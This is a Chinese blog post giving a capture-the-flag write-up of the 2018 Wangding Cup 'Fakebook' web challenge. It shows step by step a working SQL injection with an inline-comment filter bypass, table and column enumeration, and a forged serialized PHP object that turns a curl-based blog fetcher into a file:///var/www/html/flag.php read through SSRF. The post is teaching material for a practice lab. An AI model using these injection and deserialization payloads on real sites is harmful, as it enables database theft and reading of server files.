[网鼎杯 2018]Fakebook

最新推荐文章于 2024-04-24 17:24:28 发布
最新推荐文章于 2024-04-24 17:24:28 发布
阅读量189 收藏 1
点赞数
分类专栏: wp 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55234680/article/details/120958294
版权

打开题目,先看看有什么功能,发现查看用户时,网址为

view.php?no=1

尝试

view.php?no=0

得到报错界面。
尝试用"order by"测试,发现存在SQL注入,且得出字段数为4

开始尝试查询

view.php?no=0%20union%20select%201,2,3,4

回显

no hack _

用内联注释绕过

view.php?no=1%20/*!%20union*/%20select%201,2,3,4%20limit%201,1

然而出现了奇怪的报错
在这里插入图片描述
回显第二个字段
看这报错,难道是把用户数据处理成对象再序列化后存在数据库里?
暂且不管,先继续查询

view.php?no=0/*!%20union*/%20select%201,database(),3,4#

fakebook

view.php?no=0/*!%20union*/%20select%201,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'#

users

view.php?no=0/*!%20union*/%20select%201,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook'#

no,username,passwd,data

显然no、username、passwd都是知道的,但data是什么?
序列化字符串?

view.php?no=0/*!%20union*/%20select%201,group_concat(data),3,4 from users#

O:8:“UserInfo”:3:{s:4:“name”;s:5:“admin”;s:3:“age”;i:100;s:4:“blog”;s:5:“a.com”;},O:8:“UserInfo”:3:{s:4:“name”;s:6:“adminb”;s:3:“age”;i:100;s:4:“blog”;s:9:“baidu.com”;},O:8:“UserInfo”:3:{s:4:“name”;s:6:“adminc”;s:3:“age”;i:92;s:4:“blog”;s:21:“https://www.baidu.com”;}

还真是,那我的flag哪去了???
病急乱投医,拿出字典扫扫看
robots.txt和flag.php
flag.php打开是一片空白,但flag应该就在这个文件里了,那SQL注入注了个寂寞
robots.txt有用处

User-agent: *
Disallow: /user.php.bak

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

从blog中以流的形式读点东西回显,也就是ssrf ?
注册的时候把blog设置成file:///var/www/html/flag.php或许有效
然而被isValidBlog ()检测到了

这又想到之前SQL注入的奇怪报错了,看来不是白注了
猜测源码的逻辑,应该是要将data数据反序列化后访问blog,序列化前检测了blog的值,反序列化后总不会再检测一遍吧

view.php?no=0/*!%20union*/%20select%201,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:100;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#

大功告成

d0ud
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】fakebook网鼎杯2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
[网鼎杯 2018]Fakebook(ssrf漏洞)
qq_44657899的博客
03-16 4592
因为是看了wp才做出来的,所以就直接记录过程和知识点了。 知识点:SSRF SSRF,也就是Server Side RequestForgery—服务器端请求伪造。从字面上来看,与CSRF不同的是,它是服务器端发出的请求伪造而非从用户一端提交。别误会,作为受信任用户,服务器当然不可能做出损害用户信息的事。它是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。因为它是由服务端发起的,所以它能够请...
BUUCTF——[网鼎杯 2018]Fakebook
最新发布
m_de_g的博客
04-24 494
【代码】BUUCTF——[网鼎杯 2018]Fakebook
网鼎杯一道web题(fakebook
热门推荐
洞若观火
08-23 1万+
扫描: nikto扫描: 发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑扫描,发现flag.php。 user.php.bak源码: &lt;?php class UserInfo {     public $name = "";     public $age = 0;     public $...
fakebook:Facebook的克隆
05-23
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
mp12_social_network_fakebook_person
05-15
Mp12-社交网络(Fakebook)(人)[ManyToMany] 该应用程序将具有一个名为Person的实体,可以通过/ persons端点进行管理。 帖子将添加一个人,获取将显示所有这些人。 为了使一个人与另一个人成为朋友,我们将向终端...
fakebook-backend:学习个人项目探索MERN堆栈
04-10
Fakebook后端(express和mongodb)(这是一个学习/探索MERN堆栈的个人项目)入门: 确保已安装节点克隆仓库在fakebook文件夹中,创建一个带有dev.env文件的配置文件夹设置环境变量:PORT:value,MONGODB_URL = ...
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
在“Fakebook-Day2:在第2天之后,在完善蓝图功能之前”这个项目中,我们主要探讨的是如何利用Python编程语言来构建一个类似Facebook的社交网络平台。在第二天的开发阶段,我们的重点在于完善项目的蓝图(Blueprint)...
facebook-rockin-最佳自动化-selenium-scrape-no-api-tool-bot-machine-made-to-destroy-facebook:Facebook自动化:登录,喜欢,共享,评论,发布,删除。 包含视频“实际中”。 目的主要是通过在Fakebook平台中填充垃圾内容来破坏Fakebook平台(例如,当您决定离开所有这些Fcking平台时,在其中自杀)。 请安装,测试并提交您自己的改进和功能! 谢谢!
03-03
facebook-rockin最佳自动化Selenium消除无api工具的机器人机器做成销毁facebook ... 特征: 一切都是使用Selenium进行的,没有使用API 可见/无头模式 登录 获取/缓存朋友 遍历时间线 给个赞(也是不同的类型) ...
[网鼎杯 2018]Fakebook1解题思路
xiyuanyue的博客
10-08 304
s:3:"age";s:4:"blog";6、一般flag存储在根目录的flag文件或者flag.php文件修改data 数据O:8:"UserInfo":3:{s:4:"name";s:3:"age";s:4:"blog";
[网鼎杯 2024]Fakebook,网络安全事件分发机制收藏这一篇就够了
2401_84185471的博客
04-10 380
注意:序列化内容要在4号位置,这由column的顺序决定。
[网鼎杯 2018]Fakebook 解题思路&过程
iamblackcat's blog
09-12 1728
[网鼎杯 2018]Fakebook 解题思路&过程
[网鼎杯 2018]Fakebook记录
Aiwin的博客
07-17 662
[网鼎杯 2018]Fakebook
SSRF漏洞file伪协议之[网鼎杯 2018]Fakebook1
qq_58970968的博客
07-06 1480
关于SSRF漏洞(服务器端伪造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-CSDN博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_
【攻防世界】网鼎杯2018 Web fakebook
DG_s1mple
12-31 939
curl_init:初始化新的会话,返回 cURL 句柄,供curl_setopt()、 curl_exec() 和 curl_close() 函数使用。:会传入一个url值,就是我们输入的blog值,然后会curl这个url,把url返回的内容输出到页面上,curl是可以使用file协议来包含文件的。这里给了一个链接说是博客页面,猜测就是这里使用了curl获取页面,暂时还不知道怎么利用,我们再看看有没有什么能提供思路的地方。是一段序列化后的字符串,那思路就很明确了,我们需要反序列化他,传入恶意的代码。
[网鼎杯 2018]Fakebook 1
bazzza的博客
12-20 1018
先注册一个账号看看,发现对blog有过滤,注册完登录进去发现界面是这样的, 可以看到页面下方打开了我们注册的blog,可以大胆的推测他可以进行ssrf,但是blog在注册时是经过过滤的,只能是固定的格式,看起来是难以利用的。 然后,我看别人的wp,对目录扫描后可直接扫描出来robots.txt和flag.php,我自己也扫了一下, https://blog.csdn.net/weixin_43940853/article/details/105081522 ...
[原题复现][网鼎杯 2018] WEB Fakebook(SSRF、反序列化、SQL注入)
笑花大王
02-27 2642
简介 原题复现: 考察知识点:SSRF、反序列化、SQL注入 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 分析了整体结构 点击jion可以添加账号还有博客地址添加OK之后会有ifram把你的博客地址引用到当前页面 jion添加的信息点击进入发现了get注入点 注入进去没flag 不过在da...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值